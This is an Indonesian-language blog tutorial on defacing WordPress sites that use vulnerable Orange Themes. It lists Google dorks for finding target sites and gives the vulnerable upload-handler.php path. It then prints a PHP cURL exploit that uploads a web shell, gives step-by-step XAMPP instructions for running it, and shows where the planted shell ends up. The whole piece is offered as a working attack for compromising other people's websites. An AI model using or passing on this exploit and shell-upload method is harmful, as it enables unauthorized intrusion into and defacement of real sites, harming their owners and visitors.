Deface Menggunakan Exploit orange themes File Upload

Assalamualaikum , kali ini saya akan share Cara Deface Menggunakan Exploit orange themes File Upload

Oke , tanpa basa-basi , langsung saja .

Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,

• inurl:"/wp-content/themes/bordeaux-theme/"
• inurl:"/wp-content/themes/bulteno-theme/"
• inurl:"/wp-content/themes/oxygen-theme/"
• inurl:"/wp-content/themes/radial-theme/"
• inurl:"/wp-content/themes/rayoflight-theme/"
• inurl:"/wp-content/themes/reganto-theme/"
• inurl:"/wp-content/themes/rockstar-theme/"  

 Sekarang , Gunakan 1 Dork Di atas .

Saya akan mengambil 1 Dork . 

Yaitu : inurl:"/wp-content/themes/bordeaux-theme/"

Lalu , Jika Sudah dapat kan target , 

ex: www.site.com/wp-content/themes/bordeux-theme/

Anda tambahkan Vuln nya , /functions/upload-handler.php

Maka targetnya akan menjadi 

www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php

Jika Keluar Error maka Site Itu Vuln :D


nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :

1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php

Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..

Copykan Exploit ini 

<?php

$uploadfile="upload.php";

$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('orange_themes'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>



Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..

Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 



$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 




Jika sudah Save Kembali :))




Sekarang .




Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 




Cara nya 




ketik : cd\ Lalu tekan Enter 

Lalu Jika CMD anda kembali ke System C atau seperti ini

C:\Documents and Settings\Alliance>cd\

C:\>

Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter

Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..

cd:\xammp\php\>: php x.php Dan tekan Enter ..

Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD

Shell acces , www.site.com/wp-content/uploads/2013/11/up.php

Jika masih bingung , Kamu bisa Commentar di blog ini .

:) 

 

 

Sumber : dumaicodes